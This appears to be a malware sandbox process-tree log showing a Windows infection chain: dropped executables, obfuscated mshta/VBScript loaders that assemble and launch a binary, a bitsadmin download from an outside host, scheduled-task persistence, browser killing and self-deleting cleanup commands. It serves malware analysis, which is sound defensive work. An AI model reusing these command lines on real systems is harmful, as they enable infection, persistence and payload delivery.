C:\Users\Admin\AppData\Roaming\vwcireuC:\Users\Admin\AppData\Roaming\vwcireu2⤵
-
C:\Users\Admin\AppData\Roaming\vwcireuC:\Users\Admin\AppData\Roaming\vwcireu2⤵
-
C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe"C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe"2⤵
-
C:\Users\Admin\Documents\9bAY9ODUdmUWVoTbBcBIUC6N.exe"C:\Users\Admin\Documents\9bAY9ODUdmUWVoTbBcBIUC6N.exe"3⤵
-
C:\Users\Admin\Pictures\Adobe Films\6sg77Dxm3eGTTYZPQRR6pkXX.exe"C:\Users\Admin\Pictures\Adobe Films\6sg77Dxm3eGTTYZPQRR6pkXX.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\fOeZKo5yWlrxmuDmEewDgnns.exe"C:\Users\Admin\Pictures\Adobe Films\fOeZKo5yWlrxmuDmEewDgnns.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 6645⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 6845⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 7205⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 7925⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 10565⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 11525⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 11685⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 11765⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 12605⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 7885⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\CZIIMo2V2bjkOe5xVsOA7Hgo.exe"C:\Users\Admin\Pictures\Adobe Films\CZIIMo2V2bjkOe5xVsOA7Hgo.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\5xzPFQbmjWUlSW1oJ4QnCySn.exe"C:\Users\Admin\Pictures\Adobe Films\5xzPFQbmjWUlSW1oJ4QnCySn.exe"4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\FtvuzN3jeONKHs7VumypDQjX.exe"C:\Users\Admin\Pictures\Adobe Films\FtvuzN3jeONKHs7VumypDQjX.exe"4⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\FtvuzN3jeONKHs7VumypDQjX.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\FtvuzN3jeONKHs7VumypDQjX.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )5⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\FtvuzN3jeONKHs7VumypDQjX.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\FtvuzN3jeONKHs7VumypDQjX.exe" ) do taskkill -f -iM "%~NxM"6⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi7⤵
- Checks computer location settings
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )8⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )8⤵
- Blocklisted process makes network request
- Checks computer location settings
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"10⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "FtvuzN3jeONKHs7VumypDQjX.exe"7⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\VD2EwY8GRXukdfF6NuUMcfNE.exe"C:\Users\Admin\Pictures\Adobe Films\VD2EwY8GRXukdfF6NuUMcfNE.exe"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Users\Admin\Pictures\Adobe Films\VD2EwY8GRXukdfF6NuUMcfNE.exe"C:\Users\Admin\Pictures\Adobe Films\VD2EwY8GRXukdfF6NuUMcfNE.exe" -u5⤵
-
C:\Users\Admin\Pictures\Adobe Films\fW4fPhVU6bB0ya76YndsOY6f.exe"C:\Users\Admin\Pictures\Adobe Films\fW4fPhVU6bB0ya76YndsOY6f.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\UhuSYtqhJLpRERn0Qgp62I0E.exe"C:\Users\Admin\Pictures\Adobe Films\UhuSYtqhJLpRERn0Qgp62I0E.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-4A1FR.tmp\UhuSYtqhJLpRERn0Qgp62I0E.tmp"C:\Users\Admin\AppData\Local\Temp\is-4A1FR.tmp\UhuSYtqhJLpRERn0Qgp62I0E.tmp" /SL5="$10AAC,506127,422400,C:\Users\Admin\Pictures\Adobe Films\UhuSYtqhJLpRERn0Qgp62I0E.exe"5⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\is-91APL.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-91APL.tmp\DYbALA.exe" /S /UID=27096⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\e4-08840-105-0009f-5913c4bf67249\Moqycupyvi.exe"C:\Users\Admin\AppData\Local\Temp\e4-08840-105-0009f-5913c4bf67249\Moqycupyvi.exe"7⤵
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4ordnk24.gpt\GcleanerEU.exe /eufive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\4ordnk24.gpt\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\4ordnk24.gpt\GcleanerEU.exe /eufive9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ebhvsp55.ylx\installer.exe /qn CAMPAIGN="654" & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\ebhvsp55.ylx\installer.exeC:\Users\Admin\AppData\Local\Temp\ebhvsp55.ylx\installer.exe /qn CAMPAIGN="654"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xur2vbit.vwu\any.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\xur2vbit.vwu\any.exeC:\Users\Admin\AppData\Local\Temp\xur2vbit.vwu\any.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\xur2vbit.vwu\any.exe"C:\Users\Admin\AppData\Local\Temp\xur2vbit.vwu\any.exe" -u10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\utafzoj1.xdl\gcleaner.exe /mixfive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\utafzoj1.xdl\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\utafzoj1.xdl\gcleaner.exe /mixfive9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qm4plkqt.qpq\autosubplayer.exe /S & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\qm4plkqt.qpq\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\qm4plkqt.qpq\autosubplayer.exe /S9⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyEC0C.tmp\tempfile.ps1"10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyEC0C.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyEC0C.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyEC0C.tmp\tempfile.ps1"10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyEC0C.tmp\tempfile.ps1"10⤵
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyEC0C.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyEC0C.tmp\tempfile.ps1"10⤵
- Blocklisted process makes network request
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z10⤵
- Download via BitsAdmin
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\akoafrgs.o4r\GcleanerEU.exe /eufive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\akoafrgs.o4r\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\akoafrgs.o4r\GcleanerEU.exe /eufive9⤵
-
C:\Users\Admin\Pictures\Adobe Films\w71jIMviX_dwTYDfsjyMGmRA.exe"C:\Users\Admin\Pictures\Adobe Films\w71jIMviX_dwTYDfsjyMGmRA.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=15⤵
- Adds Run key to start application
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"6⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1a4,0x1a0,0xb4,0x1cc,0xa0,0x7ff87a8cdec0,0x7ff87a8cded0,0x7ff87a8cdee07⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff6ad3a9e70,0x7ff6ad3a9e80,0x7ff6ad3a9e908⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1652,1636346137692558758,14551534906032896720,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5012_991277851" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1660 /prefetch:27⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1652,1636346137692558758,14551534906032896720,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5012_991277851" --mojo-platform-channel-handle=1864 /prefetch:87⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\vwcireuC:\Users\Admin\AppData\Roaming\vwcireu2⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Roaming\vwcireuC:\Users\Admin\AppData\Roaming\vwcireu2⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Roaming\vwcireuC:\Users\Admin\AppData\Roaming\vwcireu2⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Roaming\vwcireuC:\Users\Admin\AppData\Roaming\vwcireu2⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Roaming\vwcireuC:\Users\Admin\AppData\Roaming\vwcireu2⤵
- Checks whether UAC is enabled
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\vwcireuC:\Users\Admin\AppData\Roaming\vwcireu2⤵
- Checks SCSI registry key(s)
-
C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe"C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe"2⤵
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Users\Admin\AppData\Roaming\vwcireuC:\Users\Admin\AppData\Roaming\vwcireu2⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Roaming\vwcireuC:\Users\Admin\AppData\Roaming\vwcireu2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon17afe24e0084db3.exeMon17afe24e0084db3.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon17afe24e0084db3.exe"C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon17afe24e0084db3.exe" -u2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon1708beae021a5ff.exeMon1708beae021a5ff.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\system32\mspaint.exeC:\Windows\system32\mspaint.exe2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5012 -s 5042⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\is-765C6.tmp\Mon17bbf11fdb575d.tmp"C:\Users\Admin\AppData\Local\Temp\is-765C6.tmp\Mon17bbf11fdb575d.tmp" /SL5="$30204,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon17bbf11fdb575d.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon17bbf11fdb575d.exe"C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon17bbf11fdb575d.exe" /SILENT2⤵
-
C:\Users\Admin\AppData\Local\Temp\is-OEFPG.tmp\Mon17bbf11fdb575d.tmp"C:\Users\Admin\AppData\Local\Temp\is-OEFPG.tmp\Mon17bbf11fdb575d.tmp" /SL5="$40204,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon17bbf11fdb575d.exe" /SILENT3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-3NLKH.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-3NLKH.tmp\postback.exe" ss14⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon1727c156c4abcec.exeMon1727c156c4abcec.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon1727c156c4abcec.exeC:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon1727c156c4abcec.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon174a6c5f1664f.exeMon174a6c5f1664f.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon174a6c5f1664f.exeC:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon174a6c5f1664f.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon179f74c0ff3cf1f.exeMon179f74c0ff3cf1f.exe1⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\wABnEW3n7zEIT4vldLIvVjMv.exe"C:\Users\Admin\Pictures\Adobe Films\wABnEW3n7zEIT4vldLIvVjMv.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\IdRxi4NXZM3wWqCmtrTrSQZA.exe"C:\Users\Admin\Pictures\Adobe Films\IdRxi4NXZM3wWqCmtrTrSQZA.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\R3G7dwnC5UWQSVCisTbZ3gdP.exe"C:\Users\Admin\Pictures\Adobe Films\R3G7dwnC5UWQSVCisTbZ3gdP.exe"2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\96EUARWEa4BFbq0Ckoh2XUza.exe"C:\Users\Admin\Pictures\Adobe Films\96EUARWEa4BFbq0Ckoh2XUza.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\96EUARWEa4BFbq0Ckoh2XUza.exe"C:\Users\Admin\Pictures\Adobe Films\96EUARWEa4BFbq0Ckoh2XUza.exe"3⤵
-
C:\Users\Admin\Pictures\Adobe Films\0JMtzV6kUlubGK_DnQlLVKbX.exe"C:\Users\Admin\Pictures\Adobe Films\0JMtzV6kUlubGK_DnQlLVKbX.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\4IfJXZwzYDn2VXHij3ctLJV2.exe"C:\Users\Admin\Pictures\Adobe Films\4IfJXZwzYDn2VXHij3ctLJV2.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 4IfJXZwzYDn2VXHij3ctLJV2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\4IfJXZwzYDn2VXHij3ctLJV2.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 4IfJXZwzYDn2VXHij3ctLJV2.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\uCCG6A1Q9eorB13x5Uh_rF61.exe"C:\Users\Admin\Pictures\Adobe Films\uCCG6A1Q9eorB13x5Uh_rF61.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\Rhz_9tBW6JMG__y4RAyBu9QD.exe"C:\Users\Admin\Documents\Rhz_9tBW6JMG__y4RAyBu9QD.exe"3⤵
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\pfAg8F8VPu7IfYcNYd834iax.exe"C:\Users\Admin\Pictures\Adobe Films\pfAg8F8VPu7IfYcNYd834iax.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\e3By4Ow3jW8t8NFiEpJAad1e.exe"C:\Users\Admin\Pictures\Adobe Films\e3By4Ow3jW8t8NFiEpJAad1e.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\fP3IjqkqHEOesrhdRyzNdJJr.exe"C:\Users\Admin\Pictures\Adobe Films\fP3IjqkqHEOesrhdRyzNdJJr.exe"4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\HTtyKFdmJz3J4SkY0tPaGH2B.exe"C:\Users\Admin\Pictures\Adobe Films\HTtyKFdmJz3J4SkY0tPaGH2B.exe"4⤵
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\EqT5LDve9aAE3qN61WAoAlB0.exe"C:\Users\Admin\Pictures\Adobe Films\EqT5LDve9aAE3qN61WAoAlB0.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\hEPbeAf5cdzCvC40FkJ2kgey.exe"C:\Users\Admin\Pictures\Adobe Films\hEPbeAf5cdzCvC40FkJ2kgey.exe"4⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\hEPbeAf5cdzCvC40FkJ2kgey.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\hEPbeAf5cdzCvC40FkJ2kgey.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )5⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\hEPbeAf5cdzCvC40FkJ2kgey.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\hEPbeAf5cdzCvC40FkJ2kgey.exe" ) do taskkill -f -iM "%~NxM"6⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
